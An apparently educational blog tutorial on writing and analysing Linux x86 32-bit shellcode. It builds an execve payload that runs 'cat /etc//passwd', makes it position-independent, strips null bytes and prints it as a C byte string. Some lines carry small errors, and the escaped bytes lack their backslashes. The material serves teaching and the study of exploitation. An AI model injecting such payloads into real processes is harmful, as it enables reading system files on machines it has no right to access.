Hacking

Shellcode analysis on Linux x86 32bit

Most of the programs that we use every day contain bugs; a bug is a malfunction in a program, which can make the program take unwanted actions or errors. These bugs or vulnerabilities can be exploited by writing a code that is usually called an exploit. The most common types of vulnerabilities are those that concern the corruption of memory as buffer overflows, the heap overflows, race conditions, format string attacks, etc... In this article, we won't learn to write an exploit, we will not even see how to search for a vulnerability in a software, but we will see how to write and analyze shellcode and the relationship with the above.

The shellcode is generally regarded as a program that starts a shell, and is used as the payload of the exploit. In reality, one shellcode can do everything that makes a normal program. The shellcode is executed after the vulnerability has been exploited.

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

Download Now

In this article, we will analyze and write shellcode for Linux x86 32-bit architectures.

I pointed out the type of architecture, that is because shellcode is usually written in assembly language, and each processor family has its own set of instructions. In addition, each operating system has its own system calls to make service requests to the kernel.

To make a system call using the int 0x80 instruction, the kernel then checks the value of the EAX register to take the number of the system call. Each system call is identified by a unique number that the kernel recognizes.

We look at the system call in Linux, they are located (in Ubuntu) in the following file:

- /usr/src/linux-headers-3.0.0-25/arch/x86/include/asm/unistd_32.h

It's time to start!

Let's write our first shellcode – I have chosen to write a fairly simple, so as to better understand the steps necessary to analyze and optimize it. What we need is to write shellcode that should display the command "cat" the contents of the file /etc/passwd file (this file contains some information about the system account).

[c]

;/bin/cat /etc/passwdsection .data

cmd db '/bin/cat', 0

file db '/etc//passwd'

section .text

global _start

_start:

; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)

mov eax, 11

mov edx, 0

mov ebx,cmd

push edx

mov ecx,file

push ecx

push ebx

mov ecx,esp

int 80h

[/c]

To run the program, and then view the contents of the file /etc/passwd, you must:

[c]

$ nasm -f elf shellcode00.asm

$ ld -o shellcode00 shellcode00.o

$ ,/ shellcode00

[/c]

As expected, the shellcode shows the contents of the passwd file. But look at what has been written, the code consists of the section ".data" and the section "text"; the segment data contains the variable declarations cmd and file, and the code segment contains the code required to run the command "cat /etc/passwd". In particular, it uses the execve system call, which in Linux is used to execute a program. The first argument is a pointer to the string "/bin/cat", which is the program you want to execute, the second argument (the array index) contains the program to execute bit "/bin/cat" and the argument passed "/etc//passwd", the third and final argument is empty, but must be terminated with a null pointer to 32 bits.

The first statement that we meet "mov eax, 11", the number 11 is the number of system calls.

We now start debugging with gdb

Now we follow step by step until instruction: "mov ecx, esp" and let us examine the registers ebx and ecx

We note that the ebx register contains the address of the string "/bin/cat", while the ecx register contains the address of the string "/etc//passwd", we also have to take a look at the stack:

After the instruction "mov ecx, esp", as you can see from the stack, the ecx register will contain just addresses "/bin/cat"and "/etc//passwd".

In the code we've written, there are some major problems; the first problem is that segment of the data, as you could guess the schellcode once it has been injected into a running program, it must have the code independent of the position of the variables in memory to run correctly. So the next step is that of delete the data segment,. To do this, use the following instructions:

[c]

jmp end

start:

pop ecx

[code section data]

end:

call start

db '/etc//passwd'

[/c]

This method solves the problem by putting the string immediately after the call instruction, its address is pushed onto the stack, after the pop instruction extracts the address from the stack and places it in a register, in our case the ecx register.

Considering the above, we make the change to the code (create new file shellcode01.asm), as seen below:

[c]

BITS 32

jmp end

start:

; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)

pop ecx

mov eax, 11

mov edx, 0

push 0

push dword 0x7461632f

push dword 0x6e69622f

mov ebx,esp

push edx

push ecx

push ebx

mov ecx,esp

int 80h

end:

call start

db '/etc//passwd'

[/c]

BITS 32 indicates to nams that the code we're going to run a 32-bit code, note that I decided to write /bin/cat with the instructions:

[c]

push dword 0x7461632f ; /cat

push dword 0x6e69622f ; /bin

[/c]

Then run the program (debugging with gdb) until the instruction "mov ecx, esp"

As you can see in the image above, the esp register contains the address of the string "/bin/cat" and the string "/etc/passwd", after the instruction mov ecx, esp, the ecx register will contain just the second argument of execve function.

Let us now turn to the second problem which is that of the null byte, and then examine the disassembly of the binary file to see if there are any in our code

As you can see, there are null bytes in the following lines:

[c]

8048063: b8 0b 00 00 00 mov $0xb,%eax

8048068: ba 0000 00 00 mov $0x0,%edx

[/c]

This is because the registers eax, and edx are 32-bit, and really just an 8-bit register for the operation, in fact, using the 8-bit registers al the dl, possesses the least significant byte in the current registry avoiding null bytes in the machine code

[c]

8048069: b0 0b mov $0xb,%al

804806b: b2 00 mov $0x0,%dl

[/c]

Before doing this, however, you have to reset the registers and you can safely use the instruction "xor"(since they have no effect on the flag of the processor).

Then fill the complete code (create new file shellcode02.asm):

[c]

BITS 32

jmp end

start:

; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)

pop ecx

xor eax,eax

xor edx,edx

xor ebx,ebx

mov al, 11

mov dl, 0

push ebx

push dword 0x7461632f

push dword 0x6e69622f

mov ebx,esp

push edx

push ecx

push ebx

mov ecx,esp

int 80h

end:

call start

db '/etc//passwd'

[/c]

Finally place the code that shows the instructions with the corresponding opcode:

[c]

$ nasm -f elf shellcode02.asm

$ ld -o shellcode02 shellcode02.o

[/c]

Then we can write our shellcode in the form that we are used to seeing, as shown below:

[c]

char shellcode[] ="xebx1fx59x31xc0x31xd2x31xdbxb0x0bxb2x00"

"x53x68x2fx63x61x74x68x2fx62x69x6ex89xe3"

"x52x51x53x89xe1xcdx80xe8xdcxffxffxffx2f"

"x65x74x63x2fx2fx70x61x73x73x77x64";

[/c]

At this point we have a fully functional piece of shellcode that outputs to /etc/passwd.

Conclusion

As we have seen, the assembly language is the heart of an effective and efficient shellcode. Shellcode is therefore often created to target one specific combination of processors, operating systems and service packs, called a platform. For some exploits, due to the constraints put on the shellcode by the target process, a very specific shellcode must be created. However, it is not impossible for one shellcode to work for multiple exploits, service packs, operating systems and even processors [1].

Therefore, if you are familiar with assembly language and architecture of operating systems, there is no barrier that could limit our imagination.

References

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

[1] http://en.wikipedia.org/wiki/Shellcode#Platforms

Posted: April 16, 2013

Andrea Sindoni

View Profile

Andrea Sindoni has 7 years of experience in reverse-engineering, Malware Reversing, software development and research for potential vulnerabilities in software. He very interested in finding bugs and development of low-level exploits (for educational purposes). Sindoni has experience in Kernel Mode Applications Development/Analysis on Windows and Linux. He also has a great passion in the development of scripts (mostly python) that automate the process of reversing code.

Shellcode analysis on Linux x86 32bit

Get certified and advance your career